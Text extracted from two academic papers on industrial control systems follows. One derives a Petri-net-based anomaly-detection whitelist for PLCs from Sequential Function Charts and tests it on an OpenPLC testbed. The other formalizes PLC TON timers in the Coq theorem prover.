system registers normal application/network commands and normal network information (IP, MAC address) and accepts/approves only commands/information on the list. Its system load is less than that of the blacklisting system. The whitelist update timing is restricted to the system maintenance changing the control system operation. Motivated by above, the current authors study a whitelisting system of controller, especially, Programmable Logic Controller (PLC). PLCs are widely used in industrial control systems, so enhancing security functions of PLC directly leads to enhancing those of industrial control systems. Further, our proposed whitelist of PLC [10] is expressed by LD (Ladder Diagram) which is one of most presently available PLC programming language. Using LD, our whitelisting function does not need to change the firmware of PLC and then is applicable for various PLCs. 978-1-5090-6684-1/18/$31.00 2018 IEEE 2385 Authorized licensed use limited to: Air Force Institute of Technology. 
Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. However, the current method requires that all instances are manually entered in the whitelist. Since a number of PLC is implemented in an industrial control system, even if each workload of the whitelist design is not high, the entire workload may be an enormous. Therefore, this paper considers how the setting up of the can be automatized whitelist from the PLC behavior. This paper introduces an auto-generation approach for the whitelist using SFC (Sequential Function Chart) instead of the LD. SFC and LD are compatible representations for the PLC. The whitelist designed from SFC is implemented into PLC as the LD form. Using Petri Net modeling, this paper proposes how to generate the whitelist from the SFC and how to detect abnormal operations via the whitelist. We call the SFC-based approach the model-based whitelist, the Petri Net based approach the model-based detection. Further, this paper carries out an experimental validation of the algorithms using an OpenPLC based testbed system [11]. II. CONTROL SYSTEM AND TESTBED SYSTEM Figure 1 shows a typical control system architecture in critical infrastructures and industrial systems. Control systems are composed of computers such as HMI (Human Machine Interface) and Engineering PC, network switches, controllers such as PLC and DCS (Distributed Control System), and field devices such as actuator and sensor. Along with the recent IoT (Internet of Things) developments, a number of control systems are managed and monitored over the network. Figure 1. Typical control system The previous research of the current author [11] developed a testbed system focusing on HMI, network switch, PLC, and field devices. Figure 2 shows a controller in the testbed system is made with OpenPLC [12]. OpenPLC is OSS (Open Source Software) developed by Thiago Rodrigues Alves. The computer with OpenPLC and I/O device simulates PLC functions. OpenPLC supports Microsoft Windows and Linux as computer OS and operates on computers as a WEB application using Node.js. The implementation of PLC control programming is realized by uploading ST (Structured Text) through the WEB page. I/O devices control field devices according to the computer commands. OpenPLC supports the following I/O devices: Raspberry Pi [13], Arduino and compatible boards [14], UniPi Industrial Platform [15], Modbus Slave Devices [16], ESP8226 [17] and PiXtend [18] Figure 2. OpenPLC system PLCopen Editor, OpenPLC recommends as a development environment supports five PLC languages such as LD, ST, SFC (Sequential Function Chart), FBD (Function Block Diagram) and IL (Instruction List). The languages except for ST are translated into ST by PLCopen Editor. Figure 3 shows the testbed system. We set two computers. The first is for OpenPLC and second is for HMI and Cracker PC. The two computers are connected by Modbus/TCP which is an open industrial protocol. Figure 4 shows an I/O device made by Arduino MEGA 2560. Figure 5 shows the robot arm. Arduino MEGA 2560 connects with the robot arm and the control panel. the panel has three switches (SW1, SW2 and SW3) and one LED. SW1 is the power button of the robot arm, SW2 is the stop-start switch of the arm, and SW3 is the reset switch of the arm operation. Figure 3. Testbed system Figure 4. Arduino MEGA 2560 and circuit Figure 5. Robot Arm The testbed system simulates the component conveyer system in factory automation and the robot arm conveys block type components. 
The robot arm is activated when SW1 is turned on. Start/Stop of the conveying task is controlled by SW2 turn on/off. The robot arm is returned to the original position when SW3 is turned on at the stop of the conveying task. III. SFC In this paper, we select SFC which is one of five PLC languages. SFC describes the state transition of control tasks, in other words, models the state transition of a control system. We show an example of SFC program in Figure 6. SFC is mainly constructed by four elements of Step, Initial Step, Transition and Action Block as shown in Figure 7. 2386 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. Figure 6. Example of SFC program Figure 7. SFC components Step of SFC has active or inactive states and its initial state is inactive. Step is connected with Action Blocks and Transitions. Step executes the connected Action Blocks when it is active by the connected Transition. The behavior of Initial Step is similar with Step except that its initial state is active. The source or destination of each Transition is (Initial) Step. Each Transition has a firing rule and fires if the firing rule is true and the source of (Initial) Step is active. The fire of Transition puts the state of the source (Initial) Step into inactive, and then puts the state of the destination (Initial) Step into active. In Figure 6, if T0 becomes true, then Step0 becomes inactive and Step1 becomes active. Action Block has two elements: action and qualifier. The action is a control program using LD, ST, FBD and IL. The qualifiers control an execution timing of the action elements and have 9 types such as N (Non-stored), R (Reset), S (Set), L (time Limited), D (time Delayed), P (Pulse), SD (stored and time Delayed), DS (Delayed and Stored) and SL (Stored and time Limited). Table 1 shows execution timing of the qualifiers. Table 1. Available qualifiers [19] Figure 8 shows the control program of the testbed system using SFC. SW1, SW2 and SW3 in Figure 4 are associated with each Boolean variable ( r_power_switch , r_switch and r_reset_switch ) in the control program. ON and OFF of the switches are linked to True and False of the variables. The variable isTargetAngle is true when the robot arm moves to the target positions. Table 2 shows the relation between Steps and the testbed system status. Also, the detailed procedure of Step3 is as follows: 1. The arm moves to the front of the block. 2. The arm moves to the grasping position. 3. The arm grasps the block. 4. The arm uplifts the block. 5. The arm conveys the block to the releasing position. 6. The arm releases the block. Figure 8. SFC program of the testbed system Table 2. Relation between Step and Testbed Status Qualifier Execution Timing N The action actives as long as the step is active. R The action is deactivated. S The action is activated and remains active until its reset L The action is a ctivated for a certain time. D The action becomes active after a certain time as long as the step is still active. P The action is executed just one time if the step is active. SD The action is activated after a certain time and remains active until its reset. DS The action is activated after a certain time as long as the step is still active and remains active up to a reset SL The action is activated for a certain time. 
Step Testbed Status Step0 Initial status Step1 Wake up the robot arm Step2 Standby or Stop of transportation work Step3 Conveys blocks Step4 Return the robot arm to the original position Step5 Return the robot arm to the original position and power-off the robot arm 2387 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. IV. WHITELIST FUNCTION The whitelist function registers normal operations on the list (whitelist) and rejects the operation which is not registered on the list. In control systems, normal operations of communication commands and executive orders of actuator and sensor are subject to their blueprints. Then, the whitelisting system detects zero-day attacks which deviate from the blueprints. Also, its system load is less than that of the blacklisting system. The previous work [3] of the current authors implements this whitelist function to PLC, as a PLC anomaly detection method. This method, we call ladder type whitelist or white sequence, registers execution orders of actuators and sensors on the list. The list modeled by PN (Petri Net) [20] and its state transition and its state constraint rules are converted to LD. If the rules are not satisfied, the method detects anomaly execution orders. Almost PLCs address LD, so the whitelist function is applicable to almost PLCs without updating firmware and improving hardware. The previous work [4] applies the ladder type whitelist to a servomotor control program of the testbed system. Figure 9 shows the PN model of Step3 Conveys blocks . Figure 9. PN model of servomotor control program PN is a bipartite directed graph and consists of Places, Transitions, Tokens and Arcs. Consider the state of PN retaining Tokens. Number of retained Token is limited by 0 . is an arbitrary natural number and the testbed system is = 1. It is called fire that Transition change PN state. Figure 10 shows the LD program for the state transition of Place P1 (ladder list). Figure 11 shows the LD program for the constraint condition of Place P1. Abnormal operations are state transitions violating constraint condition of Figure 11 (ladder detector). The combination of the list and the detector is the ladder type whitelist. Figure 10. The state transition of Place P1 Figure 11. The constraint condition of Place P1 The ladder type whitelist requires the PN modeling of the control program. meanwhile, the previous research does not address an efficient modeling method of normal operation. This paper introduces an auto-generation approach for the PN model using an SFC instead of the LD. SFC and LD are compatible representations for the PLC and are based on IEC (International Electrotechnical Commission) 61131-3. V. AUTO-GENERATION METHOD First, we consider the list design from SFC. PN has four elements: Places, Transitions, Tokens and Arcs. A one-to-one mapping between SFC and PN is shown in Table 3. Table 3. One-to-one mapping between SFC and PN Figure 12 shows the PN model of the testbed system. This model is converted from the SFC program subject to the one-to- one mapping. Table 4 shows the relation between Steps of SFC and Places of PN model. Table 5 shows firing rules of each Transition in the model. We call the PN model with the one-to- one mapping as the model based whitelist. Figure 12. PN model of the testbed system Table 4. 
Mapping of Steps and Places

Table 3 (one-to-one mapping between SFC and PN): a Step corresponds to a Place, a Transition to a Transition, the state of a Step to the Token of the corresponding Place, and an Arc to an Arc.

Table 4 (Step-to-Place mapping): Step0 - P1, Step1 - P2, Step2 - P3, Step3 - P4, Step4 - P5, Step5 - P6.

Table 5. Firing rules of the PN's Transitions

Next, we consider the detector design for the model-based whitelist. Each Step is controlled by Transitions, so it is natural to design the detector by observing Transitions. However, the Transitions of an SFC pose an issue when used for detection. Table 5 shows that T2, T8 and T9 have the same firing rule, and that T4 and T7 also share a firing rule, even though the robot arm motions of their source Steps differ, as shown in Table 2. We therefore have to discern Transitions with the same firing rule but different source Steps without observing the Steps. This paper solves this problem. The basic idea is to derive a firing rule for each Transition without Step information.

Denote the state of the PN at step k by x_k and consider the state space equation of the PN given by

x_{k+1} = x_k + B u_k,  (1)

where B is the incidence matrix, given by B = B_f - B_b. Here B_f is the incidence matrix from Transitions to Places and B_b is the incidence matrix from Places to Transitions. The state x_k expresses which Step the control logic occupies at step k, and the input vector u_k expresses which Transition fires at step k. For example, the incidence matrix can be auto-generated from the PN using the PN tool PIPE2 [21]. Since x_k >= 0 always holds in a PN, a typical firing rule is given by

B_b u_k <= x_k.  (2)

This rule includes Step information, which we now eliminate from (2). In the testbed system, exactly one Transition fires and exactly one Step is active at any time; that is, u_k and x_k are unit vectors. Using this fact, the state of the PN at step k is given by

x_k = B_b u_k.  (3)

Using (1) and (3), firing rule (2) is transformed to

B_b u_k <= x_k = x_{k-1} + B u_{k-1} = B_b u_{k-1} + (B_f - B_b) u_{k-1} = B_f u_{k-1}.  (4)

Therefore, the firing rule without Step information, which we call the model-based detection, is

B_b u_k <= B_f u_{k-1}.  (5)

The model-based detection allows us to determine the single fired Transition even if several Transitions with the same firing rule exist in the PN model. Table 6 shows the result of discerning the fired Transition in the PN model. In other words, the previous fire must be registered with the memory function of LD in order to auto-generate the ladder type whitelist.

Table 6. Discernment of the fired Transition

VI. EXPERIMENTAL VERIFICATION

We verified the validity of the model-based whitelist and the model-based detection by carrying out a simulated attack. Using the ladder type whitelist, the PN model is converted to LD with a focus on the Transitions. Figure 13 (ladder list) shows the state transition of Transition T2. The difference from the ladder type whitelist of [10] lies in the areas marked with the dotted line and the double line. The use of the ladder list and detector is the same as in the previous research; the difference is in how they are expressed. The dotted-line area stems from the previous fire of T2 in Table 6, and the double-line area registers the previous fire with the memory function of LD. Figure 14 (ladder detector) shows the constraint condition of T2, T8 and T9 converted from the discernment of fired Transitions.

Figure 13. The state transition of T2
Figure 14. The constraint condition of T2, T8 and T9

The other Transitions are converted to LD similarly to Figure 13 and Figure 14. We implemented these LDs on the testbed system and carried out the simulated attack. We assumed that an unknown device connects to the control network and attacks the PLC.
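Before walking through the simulated attack, the following sketch illustrates how detection rule (5) can be evaluated outside the PLC, given the forward/backward incidence matrices of a Petri net and one-hot firing vectors. It is a minimal offline illustration, not the ladder implementation used on the testbed, and the three-place net in the example is a made-up toy rather than the PN of Figure 12 (whose incidence matrices would be generated from the SFC, e.g., with PIPE2).

```python
import numpy as np

def detection_ok(B_b, B_f, u_prev, u_curr):
    """Model-based detection rule (5): the places consumed by the currently
    fired transition must be covered by the places produced by the previously
    fired transition, i.e. B_b @ u_curr <= B_f @ u_prev element-wise."""
    return bool(np.all(B_b @ u_curr <= B_f @ u_prev))

# Toy example (NOT the testbed PN): three places P1..P3, three transitions
# T1: P1 -> P2, T2: P2 -> P3, T3: P3 -> P1.
B_f = np.array([[0, 0, 1],
                [1, 0, 0],
                [0, 1, 0]])   # place x transition: arcs transition -> place
B_b = np.array([[1, 0, 0],
                [0, 1, 0],
                [0, 0, 1]])   # place x transition: arcs place -> transition

def one_hot(i, n=3):
    u = np.zeros(n)
    u[i] = 1
    return u

print(detection_ok(B_b, B_f, one_hot(0), one_hot(1)))  # T1 then T2 -> True (normal)
print(detection_ok(B_b, B_f, one_hot(0), one_hot(2)))  # T1 then T3 -> False (flagged)
```

On the PLC itself, the same condition is what the ladder detector encodes: the backward places of the currently fired Transition must be covered by the forward places of the previously fired one, and any violation (such as T3 firing right after T1 in the toy net) is flagged as an abnormal operation.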
The cracker changes the value of isTargetAngle to True taking over Modbus/TCP commands, in other words, the firing rule of T2, T8 and T9 are attacked. Figure 15 shows the testbed system status on normal operations. The figure shows three graphs. The first graph is the time sequence for fired Transitions. The second graph is the time sequence value of isTargetAngle . The last one is the ON/OFF graph of the LED. When the ladder detector detects abnormal operations, the LED is turned ON. In normal operations, the first time of the fired T2 or T8 or T9 (at dotted line around 20 sec) is discerned T2 by previous fired Transition T1, the second time of the fired (at dotted line Transition Firing rule T1 r_power_switch = True T2 isTargetAngle = True T3 r_switch = True T4 r_power_switch = False T5 r_reset_switch = True T6 r_switch = False T7 r_power_switch = False T8 isTargetAngle = True T9 isTargetAngle = True Firing rule Previous fire Current fire isTargetAngle = True T1 T2 T4 or T7 T8 T5 T9 r_power_switch = True T2 or T6 or T9 T4 T3 T7 2389 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. around 80 sec) is discerned T9 by previous fired Transition T5. Therefore, we verified the model-based whitelist functioning normally. Figure 15. Normal operations of the testbed system Next, we verify the model-based detection by simulated attacks. Figure 16 shows the testbed system status of abnormal operations. In abnormal operations, a simulation attack is occurring around 50 sec during the same normal operation. the previous fired Transition T3 is not any of T1, T4, T5 and T7. The ladder detector detected the abnormal operation by and the LED is turned ON. We verified detecting abnormal operation by model-based detection. Figure 16. Abnormal operations of the testbed system VII. CONCLUSION In this paper, we have proposed the auto-generation method of normal operations model in the testbed system using OpenPLC. We have shown that the proposed method converts simply the control program to the PN model because SFC features are utilized. We have proposed a solution to decide Transitions with the same firing rule using the previous fire of Transition. Our future work is to generalize the auto-generation method and enlarge the applicable range. This work was supported by Council for Science, Technology and Innovation (CSTI), Cross-ministerial Strategic Innovation Promotion Program (SIP), Cyber-Security for Critical Infrastructure (funding agency: NEDO). REFERENCES [1] G. Liang, The 2015 Ukraine Blackout: Implications for False Data Injection Attacks, IEEE Transactions on Power Systems 2016 [2] L. Pietre-Cambaceds, M. Tritschler and G. N. Ericsson, Cybersecurity Myths on Power Control Systems: 21 Misconceptions and False Beliefs, IEEE Transactions on Power Delivery, Vol. 26, No. 1, 161/172 (2011) [3] A. Bindra, Securing the Power Grid: Protecting Smart Grids and Connected Power Systems from Cyberattaks, IEEE Power Electronics Magazine, Vol. 4, No. 3 20/27 (2017) [4] N. Scaife, P. Travnor and K. Butler, Making Sense of the Ransomware Mess (and Planning a Sensible Path Forward), IEEE Potentials, Vol. 36, No. 6, 28/31 (2017) [5] R. Spenneberg, M. Br ggeman, H. Schwartke, PLC-Blaster: AWorm Living Solely in the PLC, BlackHat Asia, 2016 [6] Brja Merino, Modbus Stager Using PLCs as a payload/shellcode distribution system [7] T. Sasaki, K. Sawada, S. Shin, S. 
Hosokawa, Model Based Fallback Control for Networked Control System via Switched Lyapunov Function, IECON 2015 41st Annual Conference of the IEEE, 2000/2005 (2015) [8] Woo-suk Jung, Sung-Min Kim, Young-Hoon Goo, Myung-Sup Kim, Whitelist Representation for FTP Service in SCADA system by using Structured ACL Model, APNOMS 2016 18th Asia-Pacific, (2016) [9] E. Y. Chen, M. Itoh, A Whitelist Approach to Protect SIP Servers from Flooding Attacks, CQR 2010, 1/6 (2010) [10] A. Mochizuki, K. Sawada, S. Shin, S. Hosokawa, On Experimental Verification of Model Based White List for PLC Anomaly Detection, ASCC 2017, 1766/1771 (2017) [11] S. Fujita, K. Hata, A. Mochizuki, K. Sawada, S. Shin, S. Hosokawa, Open PLC based control system testbed for PLC whitelisting system, AROB 23rd 2018, 795/798 (2018) [12] http://www.openplcproject.com/ [13] https://www.raspberrypi.org/ [14] http://arduino.org/ [15] https://www.unipi.technoloty/ [16] http://www.modbustools.com/modbus_slave.html [17] https://startiot.telenor.com/lerning/esp8226-openrtos-and-managed-iot- cloud/ [18] http://www.pixtend.de/ [19] https://infosys.beckhoff.com/english.php?content=../content/1033/tcplcc ontrol/html/TcPlcCtrl_Languages%20SFC.htm [20] T. Murata, Petri Nets: Properties, Analysis and Applications, Proceedings of the IEEE, 77-4, 541/580 (1989) [21] http://pipe2.sourceforge.net/ 2390 Powered by TCPDF (www.tcpdf.org)Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply.
Formalization_and_Verification_of_PLC_Timers_in_Coq.pdf
Programmable logic controllers (PLCs) are widely used in embedded systems. A timer plays a pivotal role in PLC real-time applications. The paper presents a formalization of TON-timers of PLC programs in the theorem proving system Coq. The behavior of a timer is characterized by a set of axioms at an abstract level. PLC programs with timers are modeled in Coq. As a case study, the quiz machine problem with timer is investigated. Relevant timing properties of practical interests are proposed and proven in Coq. This work unveils the hardness of timer modeling in embedded systems. It is an attempt of formally proving the correctness of PLC programs with timer control. ed from scan cycle. Our model belongs to the third kind. Models with implicit scan cycle can be simply understood as the modeling of cyclical behavior, but the duration of each scan cycle is not considered. The reasons why we chose this are as follows: In practice, the duration of each scan cycle and the execution time of each instruction are not of greatimportance. What we concern is only the summation of durations of several adjacent scan cycles. We want to get a simpler model. If we take into account the execution time of each instruction, several auxiliary notations need to be added into the model. Though it could make our model more precise, it makes the model more complex and the reasoning more dif cult which is not necessary. In PLC, relays are used to store input, internal and output values. The modeling of scan cycle is represented by the modeling of relays. We de ne a variable Cycle as the total number of scan cycles from the start of the program. Definition Cycle := nat. After the de nition of scan cycle, there are three things to do: 1) de ne the value of each relay at each scan cycle; 2) attach time to each scan cycle; 3) determine the interpretation location of the value and time for each scan cycle. 1) Values of Relays: The values (i.e. ON and OFF) of relays change according to the cycles. In other words, they are functions from Cycle to Boolean: Definition Var := Cycle -> bool. Since Coq is a system based on intuitive logic, the results of logic computation are in the sort Prop . In order to facilitate the proof process, we use the following de nition instead: Definition Var := Cycle -> Prop. For example, given a relay rof type V ar and a cycle i, r(pred i )and(r i)are used to denote the values of relay r at (i 1)-th cycle and i-th cycle, respectively. 2) Time: Time is de ned by natural number: Definition Time := nat. Function fassociates each scan cycle with a time: Variable f : Cycle -> Time. Function fshould satisfy the monotonic property which means that the time attached to scan cycles increases strictly: Hypothesis f_monotonic:forall c, f c < f (S c). 3) Interpretations of Values and Times: The value of a relay and time at a cycle can have several interpretations. For instance, given a relay r, the values of ralong the execution of PLC program form an in nite trace which is illustrated in Fig.4. This trace alternates the I/O phase and calculation phase in nitely. The inner values of rduring the calculation phase is not of concern here. Intuitively, in Fig.4 the rst point represents the value of rat the beginning of the I/O phase of cycle 0, the second point represents the value of rat the beginning of the calculation phase of cycle 0, and so on. Thus, (r0)can have at least three different interpretations depending on whether the value is sampled at a,borc. 
Ifbis chosen, abstract trace Ais extracted from the concrete trace. In case of c, abstract trace Bis obtained. An abstract trace is a division of the concrete trace. Different abstract traces 319 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. io phase io phase io phase io phase calculation phase calculation phase calculation phase calculation phase abc (A) (B)0 1 2 3 0 1 2 3Figure 4. Different interpretations of value at a cycle separate the I/O phases and calculation phases differently. For trace B, an I/O phase and its following calculation phase belong to the same abstract cycle which is similar to the standard understanding of scan cycle. For trace A, a calculation phase and its following I/O phase belong to the same abstract cycle. Based on different abstract trace, different abstract models can be obtained. For example, two models can be built for the rst rung in Fig.2: % abstract model A Variables i0 i1 m1 : Var. Hypothesis h_m1 : forall c, m1 c = ((i0 (pred c)\/m1 (pred c))/\ i1 (pred c)). % abstract model B Variables i0 i1 m1 : Var. Hypothesis h_m1 : forall c, m1 c = ((i0 c \/ m1 (pred c)) /\ i1 c). In the rst model, since the calculation of m1 s value at cycle cis based on the values of i0andi1at the previous cycle, i0(pred c )andi1(pred c )are used. In the second model, the calculation of m1uses the values of i0andi1at the current cycle, so i0candi1care used. The discussion about the interpretations of time is similar to that of relay values. This will be discussed in detail in section IV-E. D. Rungs and Their Execution Order Every rung is modeled by a hypothesis in Coq. The execution order of instructions in a PLC program should be re ected by the model. According to the cyclic behavior of PLC and the execution order of instructions, for each node i, itsrefican be divided into two disjoint subsets: refc iandrefp i, where refc istands for the set of variables whose values at the current scan cycle are used for the execution of iandrefp istands for the set of variables whose values of the previous scan cycle are used for the execution of i. Let us take the sixth rung in Fig.2 for example, refc 6=fm1; m2; m3; m4gandrefp 6=fm5g. For any cycle c,vc2refc 6andvp2refp 6,(vcc)and (vp(pred c ))are used to calculate m5. Hence, we have the following Coq codes for the sixth rung: Hypothesis h_m5 : forall c, m5 c = (((m2 c\/m3 c\/m4 c)\/m5 (pred c))/\m1 c).E. TON-Timer As mentioned in section IV-C, based on different abstrac- tions we have different models for TON-timers. We rst give the assumption about the preset time of t1, then choose an interpretation location, nally build a model for t1. 1) Assumptions about Time: Based on the above nota- tions, de nitions of timer bit and preset time of the TON- timer are given as follows ( t1is used to denote the timer bit andt1PTof type Time denotes the preset time): Variable t1:Var. Variable t1_PT:Time. In practice, the preset time of t1must be greater than time span of any adjacent scan cycles: Hypothesis f_TLTCI : forall c, f (S c) - f c < t1_PT. 2) The Interpretation Location: The concrete trace of quiz machine is shown in Fig.5. We concern the inner values in the calculation phase here. We have several different interpretation locations. Here we choose location a. The abstract trace is the line below. The model of TON-timer t1is represented by three axioms: Axiom h_t1_reset : forall c, m1 c -> t1 c. 
Axiom h_t1_set : forall c1 c2, t1_PT<=f(pred c2)-f(pred c1)-> being_true m1 c1 c2 -> t1 c2. Axiom h_t1_true : forall c2, t1 c2->exists c1, t1_PT<=f(pred c2) - f (pred c1) /\ being_true m1 c1 c2. Axiom ht1reset re ects the second characteristic of TON-timer. The references to the same cycle cin m1c and t1c show the fact that the value of m1affects the value of t1in the same cycle. The meaning of the sec- ond axiom can be explained using Fig.5. Suppose in the abstract trace the time span from (pred c 1)to(pred c 2) is greater than or equal to t1PT (which is presented by t1PT < =f(pred c 2) f(pred c 1) ) and m1is ON between c1andc2(which is expressed by the predicate being true m 1c1c2 ). Hence in the concrete trace the time span between aandeis greater than or equal to t1PT. Because of the fth constraint mentioned in section IV-B, the time span between aandbis equal to the time span between eandf. Finally we have that the time span between bandfis greater than or equal to t1PT. Note that rung 2 contains the timer instruction. Together with the fact that m1stays ON from btog, we have that t1is ON at gin the concrete trace, in other words t1is ON at cycle c2in the abstract trace, which is the conclusion of the second axiom. The third axiom can be understood in a similar manner. These axioms forms a parameterized module for a TON- timer. The module has two parameters: IN(which is m1in the example) and PT(which is t1PTin the example). 320 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. io phase preparation rung 1 rung 2 io phase preparation rung 1 rung 2 io phase preparation rung 1 rung 2 ... ... ... aio phase preparation rung 1 rung 2 ... c b d e f ghi pred c1 pred c2 c1 c2 Figure 5. Concrete and abstract traces In general, the statement of these hypothesis have to be universally quanti ed over arbitrary inputs and outputs. For the convenience of this study, we assume that the hypothesis have been instantiated by the concrete variables in the program. V. T HECOMPLETE MODEL OF QUIZMACHINE The complete model of the quiz program is shown below: Variables i0 i1 i2 i3 i4 : Var. Variables m1 m2 m3 m4 m5: Var. Variables o0 o1 o2 o3 : Var. Variable t1 : Var. Variables t1_PT : Time. Hypothesis f_TLTCI : forall c, f (S c) - f c < t1_PT. Axiom h_t1_reset : forall c, m1 c -> t1 c. Axiom h_t1_set : forall c1 c2, t1_PT<=f(pred c2)-f(pred c1)-> being_true m1 c1 c2 -> t1 c2. Axiom h_t1_true : forall c2, t1 c2->exists c1, t1_PT<=f(pred c2) - f (pred c1) /\ being_true m1 c1 c2. Hypothesis h_m1 : forall c, m1 c = ((i0 c \/ m1 (pred c)) /\ i1 c). Hypothesis h_m2 : forall c, m2 c = ((( t1 c /\ i2 c /\ m5 (pred c)) \/ m2 (pred c)) /\ m1 c). Hypothesis h_m3 : forall c, m3 c = ((( t1 c /\ i3 c /\ m5 (pred c)) \/ m3 (pred c)) /\ m1 c). Hypothesis h_m4 : forall c, m4 c = ((( t1 c /\ i4 c /\ m5 (pred c)) \/ m4 (pred c)) /\ m1 c). Hypothesis h_m5 : forall c, m5 c = (((m2 c \/ m3 c \/ m4 c) \/ m5 (pred c)) /\ m1 c). Hypothesis h_o1 : forall c, o1 c = m2 c. Hypothesis h_o2 : forall c, o2 c = m3 c. Hypothesis h_o3 : forall c, o3 c = m4 c. Hypothesis h_o0 : forall c, o0 c=(t1 c/\ m5 c). The above model can be understood as a module with one parameter t1PT and a property fTLTCI that the parameter should satisfy. By giving t1PT a constant that satis es fTLTCI to the module, an instance can be obtained such that all properties the parameterized module hold are also held by the instance.A. 
Formalization of Properties We proved that three expected behaviors, each of which is described in a theorem, hold in Coq. The rst of these properties is delineated in the following theorem. It describes the situation that one player presses his button and then the associated light is turned on. The theorem contains various conditions to make sure that the action can proceed. In order to make the theorem clear, several predicates, such asreset then start andjust time out, are introduced. They will be explained along the description of the theorem. Theorem reset_start_time_i2_o0o1o2o3_f : forall c1 c2, reset_then_start c1 c2 -> forall c3, just_time_out c2 c3 -> forall c, S c2 <= c <= c3 -> p1_first_presses (S c2) c -> forall c4, c <= c4 -> not_reset (S c2) c4 -> stay_off o0 (S c2) c4 /\ off_on o1 (S c2) c c4 /\ stay_off o2 (S c2) c4 /\ stay_off o3 (S c2) c4. The formulae before the last arrow present the premises, i.e. the behaviors of the environment (including the actions of the host and players); those after the last arrow describe the conclusions, i.e. the expected behavior of the system. Fig.6 is a graphic representation of the theorem, where the words above the horizontal arrow describe the premises and the words below the arrow describe the conclusions. Predicate reset then start c 1c2 expresses the action sequence of the host: the host presses reset button at cycle c1 and does not press start button from cycle c1to cycle c2, then he presses start button at cycle (S c2)(i.e. the next cycle of c2). Predicate just time out c 2c3 means the time span between c2andc3is less than t1PT and that between c2and(S c3)is equal or larger than t1PT. Predicate p1first presses (S c2)c describes the fact that there exists a cycle csuch that between (S c2)and(pred c )no one presses his button and at cplayer 1is the only one that presses his button. Predicate notreset (S c2)c4 means during (S c2)andc4the reset button is not pressed. The conclusion has four predicates: 1) offon o 1(S c 2)c c4 means that light 1is off between S c2andpred c and light 1is on between cand c4; 2) stay off o 0(S c2)c4 , stay off o 2(S c2)c4 and stay off o 2(S c2)c4 describe that between S c2andc4light 0, light 1and light 3 321 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. c1 c2 S c2 pred c c c3 S c3 c4 reset ~start start < t1_value >= t1_value ~p1,~p2,~p3 p1 ~p2 ~p3 ~reset ~o1 o1 ~o0, ~o2, ~o3 Figure 6. Graphic representation of theorem 1 are all off. B. Outline of the Proof Since the proofs of the three theorems are lengthy the whole le has more than two thousand lines we only outline the proof skeleton here. The model of the quiz machine can be considered as a transition system. The state of the system is an vector consisting of all the internal relays : ( m1; m2; m3; m4; m5). The inputs of the program (i.e. i0; i1; i2; i3andi4) and the timeout signal (i.e. t1) are the guards on the transitions. Part of transition system used to prove the theorem is demonstrated in Fig.7. The numbers in the states above the line indicate the values of m1; m2; m3andm5respectively and those below the line indicate the values of o0; o1; o2ando3. The variables above the transitions represent the conditions under which the corresponding transition can take place. Variables not mentioned means the transition does not care the values of these variables. 
B. Outline of the Proof
Since the proofs of the three theorems are lengthy (the whole file has more than two thousand lines), we only outline the proof skeleton here. The model of the quiz machine can be considered as a transition system. The state of the system is a vector consisting of all the internal relays: (m1, m2, m3, m4, m5). The inputs of the program (i.e. i0, i1, i2, i3 and i4) and the timeout signal (i.e. t1) are the guards on the transitions. The part of the transition system used to prove the theorem is shown in Fig.7. The numbers in each state above the line indicate the values of m1, m2, m3, m4 and m5 respectively, and those below the line indicate the values of o0, o1, o2 and o3. The variables above the transitions represent the conditions under which the corresponding transition can take place; variables that are not mentioned mean that the transition does not depend on their values. For instance, if the system is at state s1, then all the output and internal relays are 0. If i0 is false, the system stays in s1 whatever the values of the other variables are. If i0 is true, the system changes to state s2.
The premises of the theorem express the inputs of the system and their order: 1) the host presses the reset button; 2) the host presses the start button and does not press the reset button afterwards; 3) player 1 is the first to press his button, before the timeout. We proved that, following the above inputs, the system 1) reaches s1 after the host presses the reset button; then 2) reaches s2 after the host presses the start button; then 3) reaches s3 after player 1 presses his button before the timeout. The outputs of this process coincide with the conclusion of the theorem. The other two theorems are proved in the same manner.
Figure 7. Part of the transition system (states s1 = 0 0 0 0 0 / 0 0 0 0, s2 = 1 0 0 0 0 / 0 0 0 0, s3 = 1 1 0 0 1 / 0 1 0 0; transition guards include i0 /\ ~i1, ~i0, ~i1 /\ (~(i2 /\ ~i3 /\ ~i4 /\ ~t1)), ~i1 /\ i2 /\ ~i3 /\ ~i4 /\ ~t1, ~i1 and i1)
VI. CONCLUSIONS
We presented a formalization of the TON timer of programmable logic controllers (PLCs) in the theorem prover Coq. In order to ease the modeling and verification process, a sound abstract model is proposed. Based on different interpretations, different abstract models can be obtained. The behavior of the TON-timer is described by a set of axioms at an abstract level, which proves to be appropriate for the formal reasoning in this paper. A quiz machine program with a TON-timer is employed as an illustrative example throughout the paper. We proved that the PLC quiz machine program works as expected. This work demonstrates the complexity of formal timer modeling.
REFERENCES
[1] Mader, A., Wupper, H.: Timed automaton models for simple programmable logic controllers. In: Proceedings of the Euromicro Conference on Real-Time Systems, IEEE Computer Society (1999) 114-122
[2] Coq Proof Assistant: http://www.lix.polytechnique.fr/coq/
[3] L'Her, D., Parc, P.L., Marcé, L.: Proving sequential function chart programs using automata. In: WIA '98: Revised Papers from the Third International Workshop on Automata Implementation, London, UK, Springer-Verlag (1999) 149-163
[4] Dierks, H.: PLC-automata: a new class of implementable real-time automata. Theoretical Computer Science 253(1) (2001) 61-93
[5] Bauer, N.: Übersetzung von Steuerungsprogrammen in formale Modelle. Master's thesis, University of Dortmund (1998)
[6] Moon, I.: Modelling programmable logic controllers for logic verification. IEEE Control Systems Magazine 14(2) (1994) 53-59
